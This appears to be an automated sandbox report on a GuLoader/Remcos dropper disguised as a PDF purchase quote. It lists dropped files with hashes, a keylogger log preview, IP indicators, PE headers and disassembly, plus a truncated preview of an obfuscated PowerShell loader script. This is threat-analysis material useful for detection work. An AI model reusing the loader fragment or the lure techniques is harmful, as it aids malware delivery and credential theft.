              Qoute_EXW_prices_43GJI_pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
              • 45.95.169.110
              Qoute_EXW_prices_43GJI_pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
              • 45.95.169.110
              RFQ-7H87-F8R-pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
              • 45.95.169.139
              Q-5687-348t.exeGet hashmaliciousRemcosBrowse
              • 45.95.169.135
              BdrPfb3rZS.elfGet hashmaliciousGafgyt, MiraiBrowse
              • 45.95.169.149
              otpD06ykDv.elfGet hashmaliciousGafgyt, MiraiBrowse
              • 45.95.169.149
              wzPLWj0B5C.elfGet hashmaliciousGafgytBrowse
              • 45.95.169.146
              NxFjydLnaS.elfGet hashmaliciousGafgytBrowse
              • 45.95.169.146
              zh80flVTc5.elfGet hashmaliciousGafgytBrowse
              • 45.95.169.146
              No context
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              C:\Users\user\AppData\Local\Temp\nsw96B9.tmp\nsDialogs.dllSignature-requests#24-05-25.com.exeGet hashmaliciousGuLoaderBrowse
                RFQ#120-C-Link-EE-PRODUCTION-V1110FIL001-G03230-1005-INQ.com.exeGet hashmaliciousGuLoaderBrowse
                  PO874530040021 YIKANG INQUIRY.com.exeGet hashmaliciousGuLoaderBrowse
                    Benefits-Signature-RequestsPlan#241205.com.exeGet hashmaliciousGuLoaderBrowse
                      SCOE-SP-21-091-003TKT KOREA.com.exeGet hashmaliciousGuLoaderBrowse
                        Signature-requests#24-05-25.com.exeGet hashmaliciousGuLoaderBrowse
                          RFQ#120-C-Link-EE-PRODUCTION-V1110FIL001-G03230-1005-INQ.com.exeGet hashmaliciousGuLoaderBrowse
                            PO874530040021 YIKANG INQUIRY.com.exeGet hashmaliciousGuLoaderBrowse
                              Benefits-Signature-RequestsPlan#241205.com.exeGet hashmaliciousGuLoaderBrowse
                                SCOE-SP-21-091-003TKT KOREA.com.exeGet hashmaliciousGuLoaderBrowse
                                  Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):144
                                  Entropy (8bit):3.3934082720720298
                                  Encrypted:false
                                  SSDEEP:3:rhlKlmmPlTCCU5JWRal2Jl+7R0DAlBG45klovDl6v:6lmSGCU5YcIeeDAlOWAv
                                  MD5:AA05105B986B6BC4A4FC4181A07461FD
                                  SHA1:1A38752A886BABBE447C45F58D7A72C4816B096B
                                  SHA-256:AC581EC93AEE1A86D3FA9D298D175C0FB5286C58D55FD6F412C7093E529D0CA5
                                  SHA-512:8F1C8DDF8B8F5408F1BBF5187BBA7A82AC963DCBC3ACACCA95AD17DE101507131DAB05DE32F0F71DB6FEDC036CFBDF1C7969F21125D2F2961CF17D78188D7648
                                  Malicious:true
                                  Yara Hits:
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                  Reputation:low
                                  Preview:....[.2.0.2.4./.0.8./.2.9. .0.6.:.0.3.:.5.4. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                  Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                  File Type:JSON data
                                  Category:dropped
                                  Size (bytes):962
                                  Entropy (8bit):5.013811273052389
                                  Encrypted:false
                                  SSDEEP:12:tklu+mnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlu+KdRNuKyGX85jvXhNlT3/7AcV9Wro
                                  MD5:18BC6D34FABB00C1E30D98E8DAEC814A
                                  SHA1:D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54
                                  SHA-256:862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
                                  SHA-512:8DF14178B08AD2EDE670572394244B5224C8B070199A4BD851245B88D4EE3D7324FC7864D180DE85221ADFBBCAACB9EE9D2A77B5931D4E878E27334BF8589D71
                                  Malicious:false
                                  Reputation:moderate, very likely benign file
                                  Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:modified
                                  Size (bytes):8003
                                  Entropy (8bit):4.840877972214509
                                  Encrypted:false
                                  SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                  MD5:106D01F562D751E62B702803895E93E0
                                  SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                  SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                  SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                  Malicious:false
                                  Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0xb20b6b62, page size 32768, DirtyShutdown, Windows version 10.0
                                  Category:dropped
                                  Size (bytes):15728640
                                  Entropy (8bit):0.10106922760070924
                                  Encrypted:false
                                  SSDEEP:1536:WSB2jpSB2jFSjlK/yw/ZweshzbOlqVqLesThEjv7veszO/Zk0P1EX:Wa6akUueqaeP6W
                                  MD5:8474A17101F6B908E85D4EF5495DEF3C
                                  SHA1:7B9993C39B3879C85BF4F343E907B9EBBDB8D30F
                                  SHA-256:56CC6547BDF75FA8CA4AF11433A7CAE673C8D1DF0DE51DBEEB19EF3B1D844A2A
                                  SHA-512:056D7FBFB21BFE87642D57275DD07DFD0DAE21D53A7CA7D748D4E89F199B3C212B4D6F5C4923BE156528556516AA8B4D44C6FC4D5287268C6AD5657FE5FEC7A0
                                  Malicious:false
                                  Preview:..kb... ...................':...{........................R.....)....{.......{3.h.T.........................-.1.':...{..........................................................................................................eJ......n........................................................................................................... .......':...{..............................................................................................................................................................................................,....{...........................................{3....................k.....{3..........................#......h.T.....................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exe
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):9728
                                  Entropy (8bit):5.127127260486972
                                  Encrypted:false
                                  SSDEEP:96:oVDlD3cd51V1zL7xqEscxM2DjDf3GEst+Nt+jvcx488qndYv0PLE:oVp34z/x3sREskpxjdO0PLE
                                  MD5:EB2C74E05B30B29887B3219F4EA3FDAB
                                  SHA1:91173D46B34E7BAE57ACABDBD239111B5BCC4D9E
                                  SHA-256:D253CA5ABA34B925796777893F114CC741B015AF7868022AB1DB2341288C55ED
                                  SHA-512:1BB035260223EC585170F891C2624B9AE98671F225E74B913B40BB77B66E3B9C2016037BC8E4B0AE16367D82590A60A0A3BD95D05139EA2454F02020D1B54DAE
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                  Joe Sandbox View:
                                  • Filename: Signature-requests#24-05-25.com.exe, Detection: malicious, Browse
                                  • Filename: RFQ#120-C-Link-EE-PRODUCTION-V1110FIL001-G03230-1005-INQ.com.exe, Detection: malicious, Browse
                                  • Filename: PO874530040021 YIKANG INQUIRY.com.exe, Detection: malicious, Browse
                                  • Filename: Benefits-Signature-RequestsPlan#241205.com.exe, Detection: malicious, Browse
                                  • Filename: SCOE-SP-21-091-003TKT KOREA.com.exe, Detection: malicious, Browse
                                  • Filename: Signature-requests#24-05-25.com.exe, Detection: malicious, Browse
                                  • Filename: RFQ#120-C-Link-EE-PRODUCTION-V1110FIL001-G03230-1005-INQ.com.exe, Detection: malicious, Browse
                                  • Filename: PO874530040021 YIKANG INQUIRY.com.exe, Detection: malicious, Browse
                                  • Filename: Benefits-Signature-RequestsPlan#241205.com.exe, Detection: malicious, Browse
                                  • Filename: SCOE-SP-21-091-003TKT KOREA.com.exe, Detection: malicious, Browse
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|..c8O`08O`08O`08Oa0.O`0.@=05O`0llP0=O`0.If09O`0.od09O`0Rich8O`0........PE..L.....$_...........!......... ......Y........0............................................@..........................6..k....0.......`.......................p.......................................................0...............................text............................... ..`.rdata..{....0......................@..@.data........@......................@....rsrc........`....... ..............@..@.reloc..t....p......."..............@..B................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                  File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                  Category:dropped
                                  Size (bytes):2
                                  Entropy (8bit):1.0
                                  Encrypted:false
                                  SSDEEP:3:Qn:Qn
                                  MD5:F3B25701FE362EC84616A93A45CE9998
                                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                  Malicious:false
                                  Preview:..
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                  Category:dropped
                                  Size (bytes):652036
                                  Entropy (8bit):7.571319318240958
                                  Encrypted:false
                                  SSDEEP:12288:5rRo7TKXllTfhmiKdHEHPSXbOp/NoJnYRlXO3iBM4ILaa+Brt:JC7TKXlFfsiMEHPSq8YfMiBMh+ht
                                  MD5:C1C571C4F8F69D3C8AA0EC091173BD5E
                                  SHA1:A36AC174F8EE2ED2254F69A21799837AF58071F2
                                  SHA-256:D7CF40360B1DD35E6A20B8639F0FE9CC918157DE07FF248983DB6F0EE1472DBB
                                  SHA-512:08B540AB5EBB986CC43ADD736AEE38D11A5F0DA5252384BB30C7CA7F7B464E63DEBAB4CEC5A3DD122E3280F26E57E5AC8ADC171E237A681D0E95239BDDC11A1D
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: ReversingLabs, Detection: 50%
                                  • Antivirus: Virustotal, Detection: 45%, Browse
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG.sw..PG..VA..PG.Rich.PG.........PE..L...7.$_.................b...........3............@.......................................@.................................8........`...............................................................................................................text....`.......b.................. ..`.rdata..t............f..............@..@.data...8............z..............@....ndata.......P...........................rsrc........`......................@..@................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):26
                                  Entropy (8bit):3.95006375643621
                                  Encrypted:false
                                  SSDEEP:3:ggPYV:rPYV
                                  MD5:187F488E27DB4AF347237FE461A079AD
                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                  Malicious:true
                                  Preview:[ZoneTransfer]....ZoneId=0
                                  Process:C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exe
                                  File Type:ASCII text, with very long lines (399), with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):401
                                  Entropy (8bit):4.146958731989034
                                  Encrypted:false
                                  SSDEEP:6:BXpsD8RwvVWR4VxqxQSTeAZk1VRI/XEORLsgDJLP5gBNY8Aa/hEs/UMbrbiByg8Q:zY8ejXnkfnx3DVKnLhEEU2OByUTvn
                                  MD5:C0692F6EFFCACDB1793D40EB9CF54B48
                                  SHA1:67C6613BCB30C574663724FA027B76249EAC74DD
                                  SHA-256:ACC97BB957C3FE4A4BF8FD324A5330F11B7D784A0A3DBC00C05EA65EBA63E25F
                                  SHA-512:1134F156FA1F8F3844FE39E7809EE41CBC91ABF18D9EDB78E9E14A347963C8F30423555F51AEBC22799FE2228A683D43B14E384A52349C7FF8A210D33120B991
                                  Malicious:false
                                  Preview:segnefrdiges uprises tranquilisers natan,transiteret strkstrm instigators,stvgranene vitilitigate telelphone figuren amnings warblingly flenerven,editoren building rabatternes diffraktionernes kritiseredes halsstarrigere manistic,usportsligheders sskendejalousiens saarskorperne knobet.ksebladene microbacteria vandbeholdernes laangivernes unpocketed andenstyrmanden gomutis inspirerer saksebevgelse..
                                  Process:C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):63805
                                  Entropy (8bit):1.258063443401583
                                  Encrypted:false
                                  SSDEEP:384:yoeVaoUnVbzres06nkAMRPB+Svu8sPJ2CKKJM+QnihXKgiK5DLZDFRD0QkdwW9Jl:xgUnVD0Qk1JuJR/rDe+
                                  MD5:460B464266B1AD577A3C75342AC5D6C0
                                  SHA1:89238ABE4C3EEDFB984F6DEC99E810D6F0BF8E27
                                  SHA-256:BFAA79626CBED19A43DBDA1730AA69B37196D6F03264F329B4027EEC47B3C23A
                                  SHA-512:8518C318E0672B7B079EB3600250206199B8517C3E70C91E14AAACECA3CEA2D24F2C76CA99FD0FF64518955BC81FF09A2120C1E3B4EC301B442B146C2D0D6F3A
                                  Malicious:false
                                  Preview:......................|...G..............D......u...........................L...............+..........................................n...N..........................................................a...............8.................................................................`...`..................M.................................1.............................................................................&...............................................................................(..............................................>..........................................................................................nj..........................^..........H..................z..............................................|....................&..............L......r..........c..........................................................A........................................T.........`..........f..........................h.........f.................N...............................
                                  Process:C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exe
                                  File Type:FoxPro FPT, blocks size 49152, next free block index 168, field type 0
                                  Category:dropped
                                  Size (bytes):137863
                                  Entropy (8bit):1.2585070774144376
                                  Encrypted:false
                                  SSDEEP:768:8Ws7ZnV3F+pSbjd9LX7QtXFqUNqx4q2b7LAkG0Gwa8wPT:LspLcACTuPT
                                  MD5:86F7D18D226FA9A15D3DB3E830764C1E
                                  SHA1:66BD406B7C813C5E56E6F0E7C62E209A003F126E
                                  SHA-256:2EEAB5EA88B7E582F88B38B5744F0848E54F28E58832AD4EE9209D3FA78A6B69
                                  SHA-512:D608C0FC5B96079A733CA3E8A5F38FE5DEADEF78A6FDD7F275932D4C540779471EF62C9B5182CE03189AEB95620135F6101C8862025D5EC4E079E2F13B6D42B5
                                  Malicious:false
                                  Preview:.............................................. .........................l..?..................................................................{...................................=..........................................................`...................................................................................n..............s..............g....D..............,................................................6.................7...................'...........e......,................................3............b........................ ...i.....................................0.................................................n...............................................................+...............................?.......................(.........n...L....{.3..........O......6...................................I............,.............[.......................................f.....................+......................................................d..................
                                  Process:C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):373112
                                  Entropy (8bit):7.733733506679108
                                  Encrypted:false
                                  SSDEEP:6144:qJKMnKs2+btmfUpTil2PosTKLcIxtOYigOfv9RLSrP/5PuCJE1vkynoRcv1/3:qJA+JZzkIM+gUvfLkJJMDwc53
                                  MD5:4F7BC22100B0CE9F5392BB0B43AB22C9
                                  SHA1:322F410D7C94A5F400656E1C49B5D4CEF6DDE8F2
                                  SHA-256:67E85D9212594F2E8BE65A3A6A3C8625CA5EFE8070050C390E918BCD1DA16F3A
                                  SHA-512:DFC1BA12D84C489D6F6417C1C2F775BA107076B48F2F57B0A565070A88F91334187734463F895B17DE46ACB620347A1FC36C1DEEF55969942CF4663DE48A347B
                                  Malicious:false
                                  Preview:............................b........[.333......................K...............\.000000......>.OO...................Q..-......tt..{....===.....Z.............WW.............j..........j.......))))).......55..++++......@@...AAAA..........\.kk...........d.....zzzzz......Z...........##.-..........]]...99.............R......F................................5...........A...oooo...........).*..........ee.....WWW.RRRRR............................=.B.xxxxxxx.........8.r..............O............L.....77.SS.hhhh.................".........................[....//.......GGG..........M..................@@@@...................|....Q..................................................O.n..+..................g..............5.............``.R._.^....Z.....mm......z..B.....6666..i.....--..............C.............bbb............................................HH................===.......55..............................i......................................v.........".............ggggg.k........SSS....K
                                  Process:C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exe
                                  File Type:ASCII text, with very long lines (56313), with no line terminators
                                  Category:dropped
                                  Size (bytes):56313
                                  Entropy (8bit):5.382327005406874
                                  Encrypted:false
                                  SSDEEP:1536:EeVuu5JWL3KqQUv5cK4omeaknDThcRVF5GYEnon:Ee55U2qbDFaFEYuon
                                  MD5:4BB55C98FCFAB7C0706CF43AF638C89E
                                  SHA1:58F5EC920E25FA95C47A826E34736D1159232EFD
                                  SHA-256:FAFE02F6852B01802BBFE61FE7BB3DE41E3D32DFD7B7054E8DA7774CECBB3D8D
                                  SHA-512:591FB17F2D78E25EF91EEB48D8FEE5D09DE00E553FA0710C28C84F3F1BC657CC8B4D2A4F6E982E4409D8E3450F60D13E6DBCE473D33B3FAB3D0EED3B489E5E27
                                  Malicious:false
                                  Preview:$dumhedernesndikator119=$Toerlaegningfkode24;<#Fokusere Ungdomssektion Dyreenhederne Gadaba Apporterhundes Makronavnenes #><#Systemarbejder Hemoscope sparganiaceae #><#Chimars Terebinthic Trainfuls Moocher Ekstrapoleringer baereevne #><#Ekspertice Indkrendes Introspektions #><#Rf Erantiser tingitidae Pallerne Enables Stivningerne #><#Chartae Melanization Grammatikklasses Vagotomies Manipulatability #>$Reneres = "Consu;Fishh`$,ovkeF s.ourStimuy gernsla soeRan,lpim,otu FnblnDrslgkUnhortOpdage Beret ills=Rusgi`$DramaFGobbelChloryIbenid Sknhe,nsvab p ojr FodboFerige AloirCoalpnD,creeJernps,katt;Rabbif fondupiazzn EquacCentrt Frili.erieoFakt.n Garm K,ippTSupe u Stanr adjupkn.glehi.alnTeenit,ehani ,adunMakh.eEgenpwStrkbeBe.eneHa,undWreat Blank(subst`$EtageT Hje.oDykndeSca.prBladvlHydroa crevefjerngSpec nEffeciNondinTegnsg Fu.d,.ishw`$MelanOSandbvArbeje,irisr Deith,aliso Kot uOpt.ms egune ,gen)Heart Be us{Swine.Imped`$W habRga lieT,lefcCompoaUdplau tempsDyrektLuculi UnrecBo maiBagflsSmuggeF r
                                  Process:C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):257215
                                  Entropy (8bit):1.2524928158006372
                                  Encrypted:false
                                  SSDEEP:768:3aK0Xp91FHQcqrDH/v2lPbxrdHnpKW1Zk4iQmbMOQe/JekTbQ1gjSX6sj2FTrsK1:1cpKOdGTQSkfASs58YY
                                  MD5:57E2DE349ABA532DE367D9408EAD69C8
                                  SHA1:E5DBFA6732A29FC1498052A7645D64FDB1C01796
                                  SHA-256:E3C51B58F3D75E3DCC337EC38449FA5A6B7CBA4525B7A6EB2024392BDCDF5113
                                  SHA-512:B0047557CA797BD624BFA097C6A56F18E8EA2FC346E816B5C6DFFF1BF9ED9F05FFB8235A54693D2A62EA3716C5A0174DFC438360063F4077CA283769F8489564
                                  Malicious:false
                                  Preview:............W...........................................................................................................a....................v.r.........F.......................................................................................=...........^...........K....................+............. .......................p.................m..........L...............^...........T........................t................8.....................u.........................................................~...U..............................d............................}....................................................................!.................................F..........................................................................[...Hf.....%.............7.......................................................2..............................................................k................................................X..3..........a...............I..................4..........
                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                  Entropy (8bit):7.571319318240958
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:P.O_Qouts_t87E90Y-E4R7G-PDF.exe
                                  File size:652'036 bytes
                                  MD5:c1c571c4f8f69d3c8aa0ec091173bd5e
                                  SHA1:a36ac174f8ee2ed2254f69a21799837af58071f2
                                  SHA256:d7cf40360b1dd35e6a20b8639f0fe9cc918157de07ff248983db6f0ee1472dbb
                                  SHA512:08b540ab5ebb986cc43add736aee38d11a5f0da5252384bb30c7ca7f7b464e63debab4cec5a3dd122e3280f26e57e5ac8adc171e237a681d0e95239bddc11a1d
                                  SSDEEP:12288:5rRo7TKXllTfhmiKdHEHPSXbOp/NoJnYRlXO3iBM4ILaa+Brt:JC7TKXlFfsiMEHPSq8YfMiBMh+ht
                                  TLSH:ABD402A3F440896DD6245D3044BA89EC43ABEE66E444563A33887B3BEDF7EF01507936
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG..sw..PG..VA..PG.Rich.PG.........PE..L...7.$_.................b...........3............@
                                  Icon Hash:5c49484d53ebbb7f
                                  Entrypoint:0x403312
                                  Entrypoint Section:.text
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x5F24A937 [Fri Jul 31 23:28:55 2020 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:4
                                  OS Version Minor:0
                                  File Version Major:4
                                  File Version Minor:0
                                  Subsystem Version Major:4
                                  Subsystem Version Minor:0
                                  Import Hash:ced282d9b261d1462772017fe2f6972b
                                  Instruction
                                  sub esp, 00000184h
                                  push ebx
                                  push esi
                                  push edi
                                  xor ebx, ebx
                                  push 00008001h
                                  mov dword ptr [esp+18h], ebx
                                  mov dword ptr [esp+10h], 0040A198h
                                  mov dword ptr [esp+20h], ebx
                                  mov byte ptr [esp+14h], 00000020h
                                  call dword ptr [004080B8h]
                                  call dword ptr [004080BCh]
                                  and eax, BFFFFFFFh
                                  cmp ax, 00000006h
                                  mov dword ptr [0042472Ch], eax
                                  je 00007F77A09BAD43h
                                  push ebx
                                  call 00007F77A09BDEA6h
                                  cmp eax, ebx
                                  je 00007F77A09BAD39h
                                  push 00000C00h
                                  call eax
                                  mov esi, 004082A0h
                                  push esi
                                  call 00007F77A09BDE22h
                                  push esi
                                  call dword ptr [004080CCh]
                                  lea esi, dword ptr [esi+eax+01h]
                                  cmp byte ptr [esi], bl
                                  jne 00007F77A09BAD1Dh
                                  push 0000000Bh
                                  call 00007F77A09BDE7Ah
                                  push 00000009h
                                  call 00007F77A09BDE73h
                                  push 00000007h
                                  mov dword ptr [00424724h], eax
                                  call 00007F77A09BDE67h
                                  cmp eax, ebx
                                  je 00007F77A09BAD41h
                                  push 0000001Eh
                                  call eax
                                  test eax, eax
                                  je 00007F77A09BAD39h
                                  or byte ptr [0042472Fh], 00000040h
                                  push ebp
                                  call dword ptr [00408038h]
                                  push ebx
                                  call dword ptr [00408288h]
                                  mov dword ptr [004247F8h], eax
                                  push ebx
                                  lea eax, dword ptr [esp+38h]
                                  push 00000160h
                                  push eax
                                  push ebx
                                  push 0041FCE8h
                                  call dword ptr [0040816Ch]
                                  push 0040A188h
                                  Programming Language:
                                  • [EXP] VC++ 6.0 SP5 build 8804
                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x84380xa0.rdata
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x360000x2a7f8.rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x80000x29c.rdata
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  .text0x10000x60d50x620083acff9b8bf5b52f9975f8acdcabf744False0.6630660076530612data6.4176717642026535IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  .rdata0x80000x12740x1400b8e42f3d3b81b0e2a4080ab31bc2d1f4False0.4337890625data5.061067348371254IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .data0xa0000x1a8380x600599a2f85a30bf72bff5e1c2e854c43eeFalse0.4361979166666667data3.9951628803851107IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .ndata0x250000x110000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .rsrc0x360000x2a7f80x2a80024281ea713b1dacb0dab403fce4e8476False0.4864545036764706data5.5672338377012505IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  NameRVASizeTypeLanguageCountryZLIB Complexity
